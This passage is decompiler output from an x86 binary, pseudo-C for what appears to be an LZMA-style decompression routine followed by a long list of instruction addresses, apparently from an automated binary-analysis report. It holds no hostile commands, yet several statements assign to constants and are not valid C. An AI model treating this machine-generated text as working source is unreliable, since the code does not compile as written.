											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                  0x00000000
                                                  0x004064dd
                                                  0x004064dd
                                                  0x004064e1
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00406840
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
